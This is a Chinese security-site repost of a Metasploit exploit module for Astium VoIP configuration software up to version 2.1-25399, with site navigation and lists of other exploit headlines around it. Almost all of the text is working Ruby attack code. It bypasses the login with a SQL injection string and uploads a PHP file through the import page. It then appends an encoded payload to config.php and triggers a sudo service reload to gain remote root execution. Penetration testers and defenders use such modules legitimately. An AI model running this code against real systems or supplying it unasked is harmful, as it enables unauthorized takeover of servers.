首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Astium Remote Code Execution Vulnerability
来源:metasploit.com 作者:xistence 发布时间:2013-09-29  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
  
require 'msf/core'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking # Configuration is overwritten and service reloaded
  
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  
  def initialize(info={})
    super(update_info(info,
      'Name'           => "Astium Remote Code Execution",
      'Description'    => %q{
        This module exploits vulnerabilities found in Astium astium-confweb-2.1-25399 RPM and
        lower. A SQL Injection vulnerability is used to achieve authentication bypass and gain
        admin access. From an admin session arbitrary PHP code upload is possible. It is used
        to add the final PHP payload to "/usr/local/astium/web/php/config.php" and execute the
        "sudo /sbin/service astcfgd reload" command to reload the configuration and achieve
        remote root code execution.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
        ],
      'References'     =>
        [
          [ 'OSVDB', '88860' ],
          [ 'EDB', '23831' ]
        ],
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          ['Astium 2.1', {}]
        ],
      'Privileged'     => true,
      'DisclosureDate' => "Sep 17 2013",
      'DefaultTarget'  => 0))
  
      register_options(
        [
          OptString.new('TARGETURI', [true, 'The base path to the Astium installation', '/']),
        ], self.class)
  end
  
  def peer
    return "#{rhost}:#{rport}"
  end
  
  def uri
    return target_uri.path
  end
  
  def check
    # Check version
    print_status("#{peer} - Trying to detect Astium")
  
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, "en", "content", "index.php")
    })
  
    if res and res.code == 302 and res.body =~ /direct entry from outside/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Unknown
    end
  end
  
  def exploit
    print_status("#{peer} - Access login page")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri),
      'vars_get' => {
        'js' => '0',
        'ctest' => '1',
        'origlink' => '/en/content/index.php'
      }
    })
  
    if res and res.code == 302 and res.get_cookies =~ /astiumnls=([a-zA-Z0-9]+)/
      session = $1
      print_good("#{peer} - Session cookie is [ #{session} ]")
      redirect =  URI(res.headers['Location'])
      print_status("#{peer} - Location is [ #{redirect} ]")
    else
      fail_with(Exploit::Failure::Unknown, "#{peer} - Access to login page failed!")
    end
  
  
    # Follow redirection process
    print_status("#{peer} - Following redirection")
    res = send_request_cgi({
      'uri' => "#{redirect}",
      'method' => 'GET',
      'cookie' => "astiumnls=#{session}"
    })
  
    if not res or res.code != 200
      fail_with(Exploit::Failure::Unknown, "#{peer} - Redirect failed!")
    end
  
  
    sqlirandom = rand_text_numeric(8)
  
    # SQLi to bypass authentication
    sqli="system' OR '#{sqlirandom}'='#{sqlirandom}"
  
    # Random password
    pass = rand_text_alphanumeric(10)
  
    post_data = "__act=submit&user_name=#{sqli}&pass_word=#{pass}&submit=Login"
    print_status("#{peer} - Using SQLi to bypass authentication")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(uri, "/en", "logon.php"),
      'cookie' => "astiumnls=#{session}",
      'data'   => post_data
    })
  
    if not res or res.code != 302
      fail_with(Exploit::Failure::Unknown, "#{peer} - Login bypass was not succesful!")
    end
  
    # Random filename
    payload_name = rand_text_alpha(rand(10) + 5) + '.php'
  
    phppayload = "<?php "
    # Make backup of the "/usr/local/astium/web/php/config.php" file
    phppayload << "$orig = file_get_contents('/usr/local/astium/web/php/config.php');"
    # Add the payload to the end of "/usr/local/astium/web/php/config.php". Also do a check if we are root,
    # else during the config reload it might happen that an extra shell is spawned as the apache user.
    phppayload << "$replacement = base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\");"   
    phppayload << "$f = fopen('/usr/local/astium/web/php/config.php', 'w');"
    phppayload << "fwrite($f, $orig . \"<?php if (posix_getuid() == 0) {\" . $replacement . \"} ?>\");"
    phppayload << "fclose($f);"
    # Reload astcfgd using sudo (so it will read our payload with root privileges).
    phppayload << "system('sudo /sbin/service astcfgd reload');"
    # Sleep 1 minute, so that we have enough time for the reload to trigger our payload
    phppayload << "sleep(60);"
    # Restore our original config.php, else the Astium web interface won't work anymore.
    phppayload << "$f = fopen('/usr/local/astium/web/php/config.php', 'w');"
    phppayload << "fwrite($f, $orig);"
    phppayload << "fclose($f);"
    phppayload << "?>"
  
    post_data = Rex::MIME::Message.new
    post_data.add_part("submit", nil, nil, "form-data; name=\"__act\"")
    post_data.add_part(phppayload, "application/octet-stream", nil, "file; name=\"importcompany\"; filename=\"#{payload_name}\"")
    file = post_data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
  
    print_status("#{peer} - Uploading Payload [ #{payload_name} ]")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => normalize_uri(uri, "en", "database", "import.php"),
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
      'cookie' => "astiumnls=#{session}",
      'data'   => file
    })
  
    # If the server returns 200 and the body contains our payload name,
    # we assume we uploaded the malicious file successfully
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::Unknown, "#{peer} - File wasn't uploaded, aborting!")
    end
  
    register_file_for_cleanup("/usr/local/astium/web/html/upload/#{payload_name}")
  
    print_status("#{peer} - Requesting Payload [ #{uri}upload/#{payload_name} ]")
    print_status("#{peer} - Waiting as the reloading process may take some time, this may take a couple of minutes")
    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => normalize_uri(uri, "upload", "#{payload_name}")
    }, 120)
  
    # If we don't get a 200 when we request our malicious payload, we suspect
    # we don't have a shell, either. 
    if res and res.code != 200
      print_error("#{peer} - Unexpected response...")
    end
  
  end
  
end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·mod_accounting 0.5 Blind SQL I
·Internet Explorer "wshom.ocx"
·Blast XPlayer Local Buffer Ove
·Internet Explorer 7.0 "documen
·Astium Remote Code Execution
·HylaFAX+ 5.2.4 - 5.5.3 - Buffe
·Nodejs js-yaml load() Code Exe
·Apache Tomcat/JBoss EJBInvoker
·ZeroShell Remote Code Executio
·SIEMENS Solid Edge ST4 SEListC
·Google Chrome 31.0 Webkit Audi
·FreeBSD Intel SYSRET Kernel Pr
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved